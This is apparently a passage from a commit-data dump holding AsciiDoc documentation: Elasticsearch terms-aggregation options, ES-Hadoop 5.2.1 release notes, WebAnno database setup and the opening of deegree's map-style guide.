Shard Size\n\nThe higher the requested `size` is, the more accurate the results will be, but also, the more expensive it will be to\ncompute the final results (both due to bigger priority queues that are managed on a shard level and due to bigger data\ntransfers between the nodes and the client).\n\nThe `shard_size` parameter can be used to minimize the extra work that comes with bigger requested `size`. When defined,\nit will determine how many terms the coordinating node will request from each shard. 
Once all the shards responded, the\ncoordinating node will then reduce them to a final result which will be based on the `size` parameter - this way,\none can increase the accuracy of the returned terms and avoid the overhead of streaming a big list of buckets back to\nthe client.\n\n\nNOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, Elasticsearch will\n override it and reset it to be equal to `size`.\n\n\nThe default `shard_size` will be `size` if the search request needs to go to a single shard, and `(size * 1.5 + 10)`\notherwise.\n\n==== Calculating Document Count Error\n\nThere are two error values which can be shown on the terms aggregation. The first gives a value for the aggregation as\na whole which represents the maximum potential document count for a term which did not make it into the final list of\nterms. This is calculated as the sum of the document count from the last term returned from each shard. For the example\ngiven above the value would be 46 (2 + 15 + 29). This means that in the worst case scenario a term which was not returned\ncould have the 4th highest document count.\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\" : {\n \"products\" : {\n \"doc_count_error_upper_bound\" : 46,\n \"sum_other_doc_count\" : 79,\n \"buckets\" : [\n {\n \"key\" : \"Product A\",\n \"doc_count\" : 100\n },\n {\n \"key\" : \"Product Z\",\n \"doc_count\" : 52\n }\n ...\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\/]\n\/\/ TESTRESPONSE[s\/: (\\-)?[0-9]+\/: $body.$_path\/]\n\n==== Per bucket document count error\n\nThe second error value can be enabled by setting the `show_term_doc_count_error` parameter to true:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"products\" : {\n \"terms\" : {\n \"field\" : \"product\",\n \"size\" : 5,\n \"show_term_doc_count_error\": true\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/_search\/_search\\?filter_path=aggregations\/]\n\n\nThis shows an error value for each term returned by the aggregation which represents the 'worst case' error in the document count\nand can be useful when deciding on a value for the `shard_size` parameter. This is calculated by summing the document counts for\nthe last term returned by all shards which did not return the term. In the example above the error in the document count for Product C\nwould be 15 as Shard B was the only shard not to return the term and the document count of the last term it did return was 15.\nThe actual document count of Product C was 54 so the document count was only actually off by 4 even though the worst case was that\nit would be off by 15. 
Product A, however has an error of 0 for its document count, since every shard returned it we can be confident\nthat the count returned is accurate.\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\" : {\n \"products\" : {\n \"doc_count_error_upper_bound\" : 46,\n \"sum_other_doc_count\" : 79,\n \"buckets\" : [\n {\n \"key\" : \"Product A\",\n \"doc_count\" : 100,\n \"doc_count_error_upper_bound\" : 0\n },\n {\n \"key\" : \"Product Z\",\n \"doc_count\" : 52,\n \"doc_count_error_upper_bound\" : 2\n }\n ...\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\/]\n\/\/ TESTRESPONSE[s\/: (\\-)?[0-9]+\/: $body.$_path\/]\n\nThese errors can only be calculated in this way when the terms are ordered by descending document count. When the aggregation is\nordered by the terms values themselves (either ascending or descending) there is no error in the document count since if a shard\ndoes not return a particular term which appears in the results from another shard, it must not have that term in its index. When the\naggregation is either sorted by a sub aggregation or in order of ascending document count, the error in the document counts cannot be\ndetermined and is given a value of -1 to indicate this.\n\n[[search-aggregations-bucket-terms-aggregation-order]]\n==== Order\n\nThe order of the buckets can be customized by setting the `order` parameter. By default, the buckets are ordered by\ntheir `doc_count` descending. It is possible to change this behaviour as documented below:\n\nWARNING: Sorting by ascending `_count` or by sub aggregation is discouraged as it increases the\n<<search-aggregations-bucket-terms-aggregation-approximate-counts,error>> on document counts.\nIt is fine when a single shard is queried, or when the field that is being aggregated was used\nas a routing key at index time: in these cases results will be accurate since shards have disjoint\nvalues. However otherwise, errors are unbounded. 
One particular case that could still be useful\nis sorting by <<search-aggregations-metrics-min-aggregation,`min`>> or\n<<search-aggregations-metrics-max-aggregation,`max`>> aggregation: counts will not be accurate\nbut at least the top buckets will be correctly picked.\n\nOrdering the buckets by their doc `_count` in an ascending manner:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"genre\",\n \"order\" : { \"_count\" : \"asc\" }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nOrdering the buckets alphabetically by their terms in an ascending manner:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"genre\",\n \"order\" : { \"_key\" : \"asc\" }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\ndeprecated[6.0.0, Use `_key` instead of `_term` to order buckets by their term]\n\nOrdering the buckets by single value metrics sub-aggregation (identified by the aggregation name):\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"genre\",\n \"order\" : { \"max_play_count\" : \"desc\" }\n },\n \"aggs\" : {\n \"max_play_count\" : { \"max\" : { \"field\" : \"play_count\" } }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nOrdering the buckets by multi value metrics sub-aggregation (identified by the aggregation name):\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"genre\",\n \"order\" : { \"playback_stats.max\" : \"desc\" }\n },\n \"aggs\" : {\n \"playback_stats\" : { \"stats\" : { \"field\" : \"play_count\" } }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[NOTE]\n.Pipeline aggs cannot be used for sorting\n=======================================\n\n<<search-aggregations-pipeline,Pipeline aggregations>> are run during the\nreduce phase after all other aggregations have already completed. For this\nreason, they cannot be used for ordering.\n\n=======================================\n\nIt is also possible to order the buckets based on a \"deeper\" aggregation in the hierarchy. This is supported as long\nas the aggregations path are of a single-bucket type, where the last aggregation in the path may either be a single-bucket\none or a metrics one. If it's a single-bucket type, the order will be defined by the number of docs in the bucket (i.e. `doc_count`),\nin case it's a metrics one, the same rules as above apply (where the path must indicate the metric name to sort by in case of\na multi-value metrics aggregation, and in case of a single-value metrics aggregation the sort will be applied on that value).\n\nThe path must be defined in the following form:\n\n\/\/ https:\/\/en.wikipedia.org\/wiki\/Extended_Backus%E2%80%93Naur_Form\n[source,ebnf]\n--------------------------------------------------\nAGG_SEPARATOR = '>' ;\nMETRIC_SEPARATOR = '.' 
;\nAGG_NAME = <the name of the aggregation> ;\nMETRIC = <the name of the metric (in case of multi-value metrics aggregation)> ;\nPATH = <AGG_NAME> [ <AGG_SEPARATOR>, <AGG_NAME> ]* [ <METRIC_SEPARATOR>, <METRIC> ] ;\n--------------------------------------------------\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"countries\" : {\n \"terms\" : {\n \"field\" : \"artist.country\",\n \"order\" : { \"rock>playback_stats.avg\" : \"desc\" }\n },\n \"aggs\" : {\n \"rock\" : {\n \"filter\" : { \"term\" : { \"genre\" : \"rock\" }},\n \"aggs\" : {\n \"playback_stats\" : { \"stats\" : { \"field\" : \"play_count\" }}\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe above will sort the artist's countries buckets based on the average play count among the rock songs.\n\nMultiple criteria can be used to order the buckets by providing an array of order criteria such as the following:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"countries\" : {\n \"terms\" : {\n \"field\" : \"artist.country\",\n \"order\" : [ { \"rock>playback_stats.avg\" : \"desc\" }, { \"_count\" : \"desc\" } ]\n },\n \"aggs\" : {\n \"rock\" : {\n \"filter\" : { \"term\" : { \"genre\" : \"rock\" }},\n \"aggs\" : {\n \"playback_stats\" : { \"stats\" : { \"field\" : \"play_count\" }}\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe above will sort the artist's countries buckets based on the average play count among the rock songs and then by\ntheir `doc_count` in descending order.\n\nNOTE: In the event that two buckets share the same values for all order criteria the bucket's term value is used as a\ntie-breaker in ascending alphabetical order to prevent non-deterministic ordering of buckets.\n\n==== Minimum document count\n\nIt is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"min_doc_count\": 10\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe above aggregation would only return tags which have been found in 10 hits or more. Default value is `1`.\n\n\nTerms are collected and ordered on a shard level and merged with the terms collected from other shards in a second step. However, the shard does not have the information about the global document count available. The decision if a term is added to a candidate list depends only on the order computed on the shard using local shard frequencies. The `min_doc_count` criterion is only applied after merging local terms statistics of all shards. In a way the decision to add the term as a candidate is made without being very _certain_ about if the term will actually reach the required `min_doc_count`. This might cause many (globally) high frequent terms to be missing in the final result if low frequent terms populated the candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards. However, this increases memory consumption and network traffic.\n\n`shard_min_doc_count` parameter\n\nThe parameter `shard_min_doc_count` regulates the _certainty_ a shard has if the term should actually be added to the candidate list or not with respect to the `min_doc_count`. 
Terms will only be considered if their local shard frequency within the set is higher than the `shard_min_doc_count`. If your dictionary contains many low frequent terms and you are not interested in those (for example misspellings), then you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that will with a reasonable certainty not reach the required `min_doc_count` even after merging the local counts. `shard_min_doc_count` is set to `0` per default and has no effect unless you explicitly set it.\n\n\n\nNOTE: Setting `min_doc_count`=`0` will also return buckets for terms that didn't match any hit. However, some of\n the returned terms which have a document count of zero might only belong to deleted documents or documents\n from other types, so there is no warranty that a `match_all` query would find a positive document count for\n those terms.\n\nWARNING: When NOT sorting on `doc_count` descending, high values of `min_doc_count` may return a number of buckets\n which is less than `size` because not enough data was gathered from the shards. Missing buckets can be\n back by increasing `shard_size`.\n Setting `shard_min_doc_count` too high will cause terms to be filtered out on a shard level. This value should be set much lower than `min_doc_count\/#shards`.\n\n[[search-aggregations-bucket-terms-aggregation-script]]\n==== Script\n\nGenerating the terms using a script:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"script\" : {\n \"source\": \"doc['genre'].value\",\n \"lang\": \"painless\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThis will interpret the `script` parameter as an `inline` script with the default script language and no script parameters. To use a stored script use the following syntax:\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n--------------------------------------------------\nPOST \/_scripts\/my_script\n{\n \"script\": {\n \"lang\": \"painless\",\n \"source\": \"doc[params.field].value\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"script\" : {\n \"id\": \"my_script\",\n \"params\": {\n \"field\": \"genre\"\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n==== Value Script\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"script\" : {\n \"source\" : \"'Genre: ' +_value\",\n \"lang\" : \"painless\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n==== Filtering Values\n\nIt is possible to filter the values for which buckets will be created. This can be done using the `include` and\n`exclude` parameters which are based on regular expression strings or arrays of exact values. 
Additionally,\n`include` clauses can filter using `partition` expressions.\n\n===== Filtering Values with regular expressions\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"include\" : \".*sport.*\",\n \"exclude\" : \"water_.*\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nIn the above example, buckets will be created for all the tags that has the word `sport` in them, except those starting\nwith `water_` (so the tag `water_sports` will no be aggregated). The `include` regular expression will determine what\nvalues are \"allowed\" to be aggregated, while the `exclude` determines the values that should not be aggregated. When\nboth are defined, the `exclude` has precedence, meaning, the `include` is evaluated first and only then the `exclude`.\n\nThe syntax is the same as <<regexp-syntax,regexp queries>>.\n\n===== Filtering Values with exact values\n\nFor matching based on exact values the `include` and `exclude` parameters can simply take an array of\nstrings that represent the terms as they are found in the index:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"JapaneseCars\" : {\n \"terms\" : {\n \"field\" : \"make\",\n \"include\" : [\"mazda\", \"honda\"]\n }\n },\n \"ActiveCarManufacturers\" : {\n \"terms\" : {\n \"field\" : \"make\",\n \"exclude\" : [\"rover\", \"jensen\"]\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n===== Filtering Values with partitions\n\nSometimes there are too many unique terms to process in a single request\/response pair so \nit can be useful to break the analysis up into multiple requests.\nThis can be achieved by grouping the field's values into a number of partitions at query-time and processing\nonly one partition in each request.\nConsider this request which is looking for accounts that have not logged any access recently:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"size\": 0,\n \"aggs\": {\n \"expired_sessions\": {\n \"terms\": {\n \"field\": \"account_id\",\n \"include\": {\n \"partition\": 0,\n \"num_partitions\": 20\n },\n \"size\": 10000,\n \"order\": {\n \"last_access\": \"asc\"\n }\n },\n \"aggs\": {\n \"last_access\": {\n \"max\": {\n \"field\": \"access_date\"\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThis request is finding the last logged access date for a subset of customer accounts because we\nmight want to expire some customer accounts who haven't been seen for a long while.\nThe `num_partitions` setting has requested that the unique account_ids are organized evenly into twenty\npartitions (0 to 19). and the `partition` setting in this request filters to only consider account_ids falling \ninto partition 0. Subsequent requests should ask for partitions 1 then 2 etc to complete the expired-account analysis.\n\nNote that the `size` setting for the number of results returned needs to be tuned with the `num_partitions`. \nFor this particular account-expiration example the process for balancing values for `size` and `num_partitions` would be as follows:\n\n1. Use the `cardinality` aggregation to estimate the total number of unique account_id values\n2. Pick a value for `num_partitions` to break the number from 1) up into more manageable chunks\n3. 
Pick a `size` value for the number of responses we want from each partition\n4. Run a test request\n\nIf we have a circuit-breaker error we are trying to do too much in one request and must increase `num_partitions`.\nIf the request was successful but the last account ID in the date-sorted test response was still an account we might want to \nexpire then we may be missing accounts of interest and have set our numbers too low. We must either \n\n* increase the `size` parameter to return more results per partition (could be heavy on memory) or\n* increase the `num_partitions` to consider less accounts per request (could increase overall processing time as we need to make more requests)\n\nUltimately this is a balancing act between managing the Elasticsearch resources required to process a single request and the volume\nof requests that the client application must issue to complete a task.\n\n==== Multi-field terms aggregation\n\nThe `terms` aggregation does not support collecting terms from multiple fields\nin the same document. The reason is that the `terms` agg doesn't collect the\nstring term values themselves, but rather uses\n<<search-aggregations-bucket-terms-aggregation-execution-hint,global ordinals>>\nto produce a list of all of the unique values in the field. Global ordinals\nresults in an important performance boost which would not be possible across\nmultiple fields.\n\nThere are two approaches that you can use to perform a `terms` agg across\nmultiple fields:\n\n<<search-aggregations-bucket-terms-aggregation-script,Script>>::\n\nUse a script to retrieve terms from multiple fields. This disables the global\nordinals optimization and will be slower than collecting terms from a single\nfield, but it gives you the flexibility to implement this option at search\ntime.\n\n<<copy-to,`copy_to` field>>::\n\nIf you know ahead of time that you want to collect the terms from two or more\nfields, then use `copy_to` in your mapping to create a new dedicated field at\nindex time which contains the values from both fields. You can aggregate on\nthis single field, which will benefit from the global ordinals optimization.\n\n==== Collect mode\n\nDeferring calculation of child aggregations\n\nFor fields with many unique terms and a small number of required results it can be more efficient to delay the calculation\nof child aggregations until the top parent-level aggs have been pruned. Ordinarily, all branches of the aggregation tree\nare expanded in one depth-first pass and only then any pruning occurs.\nIn some scenarios this can be very wasteful and can hit memory constraints.\nAn example problem scenario is querying a movie database for the 10 most popular actors and their 5 most common co-stars:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"actors\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 10\n },\n \"aggs\" : {\n \"costars\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 5\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nEven though the number of actors may be comparatively small and we want only 50 result buckets there is a combinatorial explosion of buckets\nduring calculation - a single actor can produce n\u00b2 buckets where n is the number of actors. The sane option would be to first determine\nthe 10 most popular actors and only then examine the top co-stars for these 10 actors. 
This alternative strategy is what we call the `breadth_first` collection\nmode as opposed to the `depth_first` mode.\n\nNOTE: The `breadth_first` is the default mode for fields with a cardinality bigger than the requested size or when the cardinality is unknown (numeric fields or scripts for instance).\nIt is possible to override the default heuristic and to provide a collect mode directly in the request:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"actors\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 10,\n \"collect_mode\" : \"breadth_first\" <1>\n },\n \"aggs\" : {\n \"costars\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 5\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> the possible values are `breadth_first` and `depth_first`\n\nWhen using `breadth_first` mode the set of documents that fall into the uppermost buckets are\ncached for subsequent replay so there is a memory overhead in doing this which is linear with the number of matching documents.\nNote that the `order` parameter can still be used to refer to data from a child aggregation when using the `breadth_first` setting - the parent\naggregation understands that this child aggregation will need to be called first before any of the other child aggregations.\n\nWARNING: Nested aggregations such as `top_hits` which require access to score information under an aggregation that uses the `breadth_first`\ncollection mode need to replay the query on the second pass but only for the documents belonging to the top buckets.\n\n[[search-aggregations-bucket-terms-aggregation-execution-hint]]\n==== Execution hint\n\nThere are different mechanisms by which terms aggregations can be executed:\n\n - by using field values directly in order to aggregate data per-bucket (`map`)\n - by using global ordinals of the field and allocating one bucket per global ordinal (`global_ordinals`)\n\nElasticsearch tries to have sensible defaults so this is something that generally doesn't need to be configured.\n\n`global_ordinals` is the default option for `keyword` field, it uses global ordinals to allocates buckets dynamically\nso memory usage is linear to the number of values of the documents that are part of the aggregation scope.\n\n`map` should only be considered when very few documents match a query. Otherwise the ordinals-based execution mode\nis significantly faster. 
By default, `map` is only used when running an aggregation on scripts, since they don't have\nordinals.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"execution_hint\": \"map\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> The possible values are `map`, `global_ordinals`\n\nPlease note that Elasticsearch will ignore this execution hint if it is not applicable and that there is no backward compatibility guarantee on these hints.\n\n==== Missing value\n\nThe `missing` parameter defines how documents that are missing a value should be treated.\nBy default they will be ignored but it is also possible to treat them as if they\nhad a value.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"missing\": \"N\/A\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> Documents without a value in the `tags` field will fall into the same bucket as documents that have the value `N\/A`.\n\n==== Mixing field types\n\nWARNING: When aggregating on multiple indices the type of the aggregated field may not be the same in all indices.\nSome types are compatible with each other (`integer` and `long` or `float` and `double`) but when the types are a mix\nof decimal and non-decimal number the terms aggregation will promote the non-decimal numbers to decimal numbers.\nThis can result in a loss of precision in the bucket values.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fcec63bca3b6718739033cf114dc488f9653bd47","subject":"Fixing doc error","message":"Fixing doc error\n","repos":"elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/appendix\/release-notes\/5.2.1.adoc","new_file":"docs\/src\/reference\/asciidoc\/appendix\/release-notes\/5.2.1.adoc","new_contents":"[[eshadoop-5.2.1]]\n== Elasticsearch for Apache Hadoop version 5.2.1\nFebruary 14, 2017\n\nES-Hadoop 5.2.1 is a version compatibility release, tested specifically against Elasticsearch 5.2.1.\n\n[[docs-5.2.1]]\n=== Documentation\n* Updated links that point to the ES reference documentation to use version 5.2 instead of 2.0.","old_contents":"[[eshadoop-5.2.1]]\n== Elasticsearch for Apache Hadoop version 5.2.1\nFebruary 14, 2017\n\nES-Hadoop 5.2.1 is a version compatibility release, tested specifically against Elasticsearch 5.2.1.\n\n[[docs-5.1.2]]\n=== Documentation\n* Updated links that point to the ES reference documentation to use version 5.2 instead of 2.0.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1d403515f983f1b66bfaf2435820d021bc437d0f","subject":"No issue. Fixed table.","message":"No issue. 
Fixed table.\n","repos":"webanno\/webanno,webanno\/webanno,webanno\/webanno,webanno\/webanno","old_file":"webanno-doc\/src\/main\/asciidoc\/admin-guide\/database.adoc","new_file":"webanno-doc\/src\/main\/asciidoc\/admin-guide\/database.adoc","new_contents":"\/\/ Copyright 2015\n\/\/ Ubiquitous Knowledge Processing (UKP) Lab and FG Language Technology\n\/\/ Technische Universit\u00e4t Darmstadt\n\/\/ \n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/ \n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/ \n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[sect_database]]\n== Database\n\nWebAnno uses an SQL database to store project and user data. \n\nWe test MySQL using a MySQL server. WebAnno uses by default an embedded HSQLDB database. However, we \nrecommend using the embedded database only for testing purposes. For production use, we recommend\nusing a MySQL server. The reason for this is, that:\n\n* we do more testing on the MySQL server and\n* in the past, we had cases where we described in-place upgrade procedures that required performing\n SQL commands to change the data model as part of the upgrade. We promise to try avoiding this in\n the future. However, in case we offer advice on fixing anything directly in the database, this\n advice will refer to a MySQL database.\n\nWe try to keep the data model simple, so there should be no significant requirements to the database\nbeing used. Theoretically, it should be possible to use any JDBC-compatible database after adding a\ncorresponding driver to the classpath and configuring WebAnno to use the driver in the\n`settings.properties` file.\n\nIf you plan to use UTF-8 encoding for project name and tagset\/tag name, make sure either of the following settings for MySQL databse\na) in the `settings.properties` file, make sure that `database.url` includes \n\n----\nuseUnicode=true&characterEncoding=UTF-8\n----\n\nb) change the `my.conf` MySQL databse configuration file to include the following line\n\n----\ncharacter-set-server = utf8\n----\n\n=== Using HSQLDB in production\n\nWebAnno displays a warning in the user interface when an embedded database is being used. In case\nthat you really want to run WebAnno with an embedded database in production, you probably want to\ndisable this warning. 
To do so, please add the following entry to the `settings.properties` file:\n\n----\nwarnings.embeddedDatabase=false\n----\n","old_contents":"\/\/ Copyright 2015\n\/\/ Ubiquitous Knowledge Processing (UKP) Lab and FG Language Technology\n\/\/ Technische Universit\u00e4t Darmstadt\n\/\/ \n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/ \n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/ \n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[sect_database]]\n== Database\n\nWebAnno uses an SQL database to store project and user data. \n\nWe test MySQL using a MySQL server. WebAnno uses by default an embedded HSQLDB database. However, we \nrecommend using the embedded database only for testing purposes. For production use, we recomment\nusing a MySQL server. The reason for this is, that:\n\n* we do more testing on the MySQL server and\n* in the past, we had cases where we described in-place upgrade procedures that required performing\n SQL commands to change the data model as part of the upgrade. We promise to try avoiding this in\n the future. However, in case we offer advice on fixing anything directly in the database, this\n advice will refer to a MySQL database.\n\nWe try to keep the data model simple, so there should be no significant requirements to the database\nbeing used. Theoretically, it should be possible to use any JDBC-compatible database after adding a\ncorresponding driver to the classpath and configuring WebAnno to use the driver in the\n`settings.properties` file.\n\nIf you plan to use UTF-8 encoding for project name and tagset\/tag name, make sure either of the following settings for MySQL databse\na) in the `settings.properties` file, make sure that `database.url` includes \n\n----\nuseUnicode=true&characterEncoding=UTF-8\n----\n\nb) change the `my.conf` MySQL databse configuration file to include the following line\n\n----\ncharacter-set-server = utf8\n----\n\n=== Using HSQLDB in production\n\nWebAnno displays a warning in the user interface when an embedded database is being used. In case\nthat you really want to run WebAnno with an embedded database in production, you probably want to\ndisable this warning. To do so, please add the following entry to the `settings.properties` file:\n\n----\nwarnings.embeddedDatabase=false\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a1257a52a7cd47636bea96e68f5adea5774ebe1","subject":"fix type","message":"fix type","repos":"deegree\/deegree3,deegree\/deegree3,deegree\/deegree3,deegree\/deegree3,deegree\/deegree3","old_file":"deegree-services\/deegree-webservices-handbook\/src\/main\/asciidoc\/renderstyles.adoc","new_file":"deegree-services\/deegree-webservices-handbook\/src\/main\/asciidoc\/renderstyles.adoc","new_contents":"[[anchor-configuration-renderstyles]]\n== Map styles\n\nStyle resources are used to obtain information on how to render geo\nobjects (mostly features, but also coverages) into maps. The most common\nuse case is to reference them from a layer configuration, in order to\ndescribe how the layer is to be rendered. 
This chapter assumes the\nreader is familiar with basic SLD\/SE terms. The style configurations do\nnot depend on any other resource.\n\nIn contrast to other deegree configurations the style configurations do\nnot have a custom format. You can use standard SLD or SE documents\n(1.0.0 and 1.1.0 are supported), with a couple of deegree specific\nextensions, which are described below. Please refer to the\nhttp:\/\/www.opengeospatial.org\/standards\/sld[SLD] and\nhttp:\/\/www.opengeospatial.org\/standards\/se[SE] specifications for\nreference. Additionally this page contains specific examples below.\n\nIn deegree terms, each SLD or SE file will create a _style store_. In\ncase of an SE file (usually beginning at the FeatureTypeStyle or\nCoverageStyle level) the style store only contains one style, in case of\nan SLD file the style store may contain multiple styles, each identified\nby the layer (only NamedLayers make sense here) and the name of the\nstyle (only UserStyles make sense) when referenced later.\n\n.Style resources define how geo objects are rendered\nimage::workspace-overview-style.png[Style resources define how geo objects are rendered,scaledwidth=80.0%]\n\nTIP: When defining styles, take note of the log file. Upon startup the log\nwill warn you about potential problems or errors during parsing, and\nupon rendering warnings will be emitted when rendering is unsuccessful\neg. because you had a typo in a geometry property name. When you're\nseeing an empty map when expecting a fancy one, check the log before\nreporting a bug. deegree will tolerate a lot of syntactical errors in\nyour style files, but you're more likely to get a good result when your\nfiles validate and you have no warnings in the log.\n\n=== Overview\n\nFrom the point of view of the Symbology Encoding Standard, there are 5\nkinds of symbolizations, which can be present in a map image:\n\n * *Point symbolizations*\n * *Line symbolizations*\n * *Polygon symbolizations*\n * *Text symbolizations*\n * *Raster symbolizations*\n\nThe first 4 symbolizations usually represent vector feature objects.\nRaster symbolization is used to visualize raster data. This\ndocumentation chapter describes, how those symbolizations can be\nrealized using OGC symbology encoding. It will lead from the underlying\nbasics to some more complex constructions for map visulization.\n\n=== Basics\n\n==== General Layout\n\nThe general structure of an SE-Style contains:\n\n[source,xml]\n----\n<FeatureTypeStyle>\n<FeatureTypeName> \n<Rule> \n----\n\nIt is constructed like this:\n\n[source,xml]\n----\n<FeatureTypeStyle xmlns=\"http:\/\/www.opengis.net\/se\" xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:sed=\"http:\/\/www.deegree.org\/se\" xmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\" xmlns:plan=\"http:\/\/www.deegree.org\/plan\" xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" xsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <FeatureTypeName>plan:yourFeatureType<\/FeatureTypeName>\n <Rule>\n ...\n <\/Rule>\n<\/FeatureTypeStyle>\n----\n\nTIP: Before you start, always remember that every style is read top-down. So\nbe aware the second <Rule> will overpaint the first one, the third\noverpaints the second and so on\n\n==== Symbolization Rules\n\nEvery specific map visualization needs its own symbolization rule. Rules\nare defined within the *<Rule>* element. 
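In outline, a rule might look like the following sketch (the names are\nonly placeholders, element contents are elided):\n\n[source,xml]\n----\n<Rule>\n <Name>exampleRule<\/Name>\n <Description>\n <Title>Example rule<\/Title>\n <\/Description>\n <PointSymbolizer>\n ...\n <\/PointSymbolizer>\n<\/Rule>\n----\n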
